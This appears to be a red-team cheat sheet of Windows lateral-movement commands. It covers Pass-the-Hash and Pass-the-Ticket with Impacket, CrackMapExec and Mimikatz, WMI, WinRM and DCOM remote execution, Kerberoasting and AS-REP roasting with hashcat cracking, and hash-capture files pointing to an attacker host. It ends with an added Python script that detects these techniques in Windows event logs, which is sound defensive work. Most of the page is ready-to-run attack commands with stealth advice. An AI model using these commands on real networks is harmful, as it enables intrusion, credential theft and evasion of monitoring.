Lateral Movement
Pass-the-Hash, Pass-the-Ticket, PsExec, WMI, WinRM: moving through a compromised network
snippet · advanced · 2025-05-13 · 3 min read
Pass-the-Hash (PtH)
```bash
# Impacket: PsExec with an NTLM hash
psexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes {{NTLM_HASH}}
# Impacket: WMIExec (fewer traces)
wmiexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes {{NTLM_HASH}}
# Impacket: SMBExec
smbexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes {{NTLM_HASH}}
# Impacket: ATExec (via Task Scheduler)
atexec.py {{TARGET_DOMAIN}}/{{USER}}@{{TARGET_IP}} -hashes {{NTLM_HASH}} "whoami"
# CrackMapExec: mass PtH sweep
crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}}
crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}} -x "whoami"
crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}} --sam
# xfreerdp: RDP with a hash (Restricted Admin Mode required)
xfreerdp /v:{{TARGET_IP}} /u:{{USER}} /pth:{{NTLM_HASH}}
```
Pass-the-Ticket (PtT)
```bash
# Export tickets from memory (Mimikatz)
mimikatz # sekurlsa::tickets /export   # creates .kirbi files
# Import a ticket
mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-{{USER}}@cifs-target.kirbi
mimikatz # kerberos::ptt ticket.kirbi
# Check the tickets in memory
mimikatz # kerberos::list
klist   # native Windows command
# From Linux: convert and use
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass {{TARGET_DOMAIN}}/{{USER}}@{{TARGET}}
# Overpass-the-Hash (NTLM -> Kerberos ticket)
mimikatz # sekurlsa::pth /user:{{USER}} /ntlm:{{NTLM_HASH}} /domain:{{TARGET_DOMAIN}} /run:powershell.exe
# Then, in the new process:
klist   # check the generated tickets
```
PsExec and variants
```bash
# Impacket PsExec (creates a service: noisy, detected by EDR)
psexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}}
# Sysinternals PsExec (native)
PsExec.exe \\{{TARGET_IP}} -u {{TARGET_DOMAIN}}\{{USER}} -p {{PASSWORD}} cmd.exe
# SmbExec (no binary dropped on disk)
smbexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}}
```
WMI
```bash
# Impacket WMIExec (semi-interactive, no service created)
wmiexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}}
wmiexec.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}}@{{TARGET_IP}} "ipconfig /all"
# PowerShell: local WMI
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt"
# PowerShell: remote WMI
$cred = Get-Credential
Invoke-WmiMethod -ComputerName {{TARGET_IP}} -Credential $cred -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt"
[wmiclass]"\\{{TARGET_IP}}\root\cimv2:Win32_Process" | Invoke-WmiMethod -Name Create -ArgumentList "cmd.exe"
```
WinRM / PowerShell Remoting
```bash
# From Linux
evil-winrm -i {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}}
evil-winrm -i {{TARGET_IP}} -u {{USER}} -H {{NTLM_HASH}}
# From Windows
Enter-PSSession -ComputerName {{TARGET_IP}} -Credential (Get-Credential)
Invoke-Command -ComputerName {{TARGET_IP}} -Credential (Get-Credential) -ScriptBlock { whoami; hostname }
# CrackMapExec
crackmapexec winrm {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}} -x "whoami"
crackmapexec winrm {{TARGET_IP}} -u {{USER}} -H {{NTLM_HASH}} -x "whoami"
```
DCOM
```powershell
# MMC20.Application (port 135)
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","{{TARGET_IP}}"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c powershell -e {{B64_PAYLOAD}}","7")
# ShellWindows
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application","{{TARGET_IP}}"))
$dcom.ShellExecute("cmd.exe","/c powershell -e {{B64_PAYLOAD}}","C:\Windows\System32","",0)
```
Kerberoasting
```bash
# GetUserSPNs, from Linux
GetUserSPNs.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}} -dc-ip {{TARGET_IP}} -request
GetUserSPNs.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}} -dc-ip {{TARGET_IP}} -request -outputfile kerberoast.txt
# PowerView, from Windows
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv kerberoast.csv -NoTypeInformation
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File kerberoast.txt
# Crack
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
```
ASREPRoasting
```bash
# GetNPUsers: accounts that do not require Kerberos pre-authentication
GetNPUsers.py {{TARGET_DOMAIN}}/ -dc-ip {{TARGET_IP}} -usersfile users.txt -format hashcat
GetNPUsers.py {{TARGET_DOMAIN}}/{{USER}}:{{PASSWORD}} -dc-ip {{TARGET_IP}} -request -format hashcat
# PowerView
Get-DomainUser -PreauthNotRequired | Get-ASREPHash -Format Hashcat | Out-File asrep.txt
# Crack the AS-REP hash (mode 18200)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
```
Lateral movement via shares
```bash
# Find shares with write access
crackmapexec smb {{TARGET}}/24 -u {{USER}} -p {{PASSWORD}} --shares
# Drop a file for hash capture (Responder)
# Create a @malicious.url or desktop.ini file in a shared folder
printf '[InternetShortcut]\nURL=file://{{LHOST}}/x\n' > capture.url
# SCF file (in a share)
printf '[Shell]\nCommand=2\nIconFile=\\\\{{LHOST}}\\share\\icon.ico\n' > loot.scf
# Capture with Responder
responder -I {{INTERFACE}} -wrf
```
💡 Tip
WMIExec and ATExec are stealthier than PsExec because they do not create a Windows service (Event ID 7045). Evil-WinRM leaves traces in the PowerShell Remoting logs (Event ID 4103/4104). The most furtive move remains PtT with a valid ticket: no new process is created.
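As an added defensive example (not from the original cheat sheet), a Python triage script that scans constructed Windows event records for the artifacts this tip names: 7045 service installs from PsExec-style tools and 4103/4104 script blocks carrying the WMI, DCOM or encoded-PowerShell commands shown on this page, plus 4769 RC4 ticket requests as a Kerberoasting indicator the page itself does not list. The event field names, hosts and sample values are assumptions made for the example.

```python
import re

# Constructed sample events, shaped like SIEM-normalised Windows event records.
# Hosts, account names and paths are made up for this example.
EVENTS = [
    {"host": "WS01", "id": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"host": "WS01", "id": 7045, "ServiceName": "Spooler",
     "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe"},
    {"host": "WS02", "id": 4104, "ScriptBlockText":
     'Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami"'},
    {"host": "WS02", "id": 4104, "ScriptBlockText": "Get-Service | Where-Object Status -eq Running"},
    {"host": "DC01", "id": 4769, "TargetUserName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
]

# Script-block patterns derived from the techniques on this page.
SCRIPT_PATTERNS = [
    re.compile(r"Win32_Process.*-Name\s+Create", re.I),                     # WMI process creation
    re.compile(r'GetTypeFromProgID\("(MMC20|Shell)\.Application"', re.I),   # DCOM activation
    re.compile(r"powershell(\.exe)?\s+-e\S*\s+[A-Za-z0-9+/=]{20,}", re.I),  # encoded payload
]

def classify(ev):
    """Return a finding string for a suspicious event, or None."""
    eid = ev["id"]
    if eid == 7045:
        # Service install, the artifact PsExec leaves behind: PSEXESVC is the
        # Sysinternals service; a binary dropped straight into %SystemRoot%
        # (the ADMIN$ share) is the generic shape of PsExec-style tools.
        path = ev["ImagePath"].strip('"')
        if ev["ServiceName"].upper() == "PSEXESVC" or \
                re.fullmatch(r"%SystemRoot%\\[^\\]+\.exe", path, re.I):
            return f"7045 service install {ev['ServiceName']} -> {path}"
    elif eid in (4103, 4104):
        # Module / script-block logging produced by PowerShell Remoting sessions.
        text = ev.get("ScriptBlockText") or ev.get("Payload", "")
        for pat in SCRIPT_PATTERNS:
            if pat.search(text):
                return f"{eid} remote-execution script block matched {pat.pattern!r}"
    elif eid == 4769 and ev.get("TicketEncryptionType", "").lower() == "0x17":
        # RC4 service-ticket request: the usual Kerberoasting footprint, assuming
        # the domain's baseline is AES so that RC4 requests stand out.
        return f"4769 RC4 TGS for {ev['TargetUserName']} from {ev['IpAddress']}"
    return None

def scan(events):
    """Return (host, finding) pairs for every suspicious event, in input order."""
    return [(ev["host"], f) for ev in events if (f := classify(ev))]
```

Run `scan(EVENTS)` to get the three findings from the sample set; the benign Spooler install and the harmless Get-Service block are left alone.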
OPS·BRAIN v1.075 notes · Securitylocal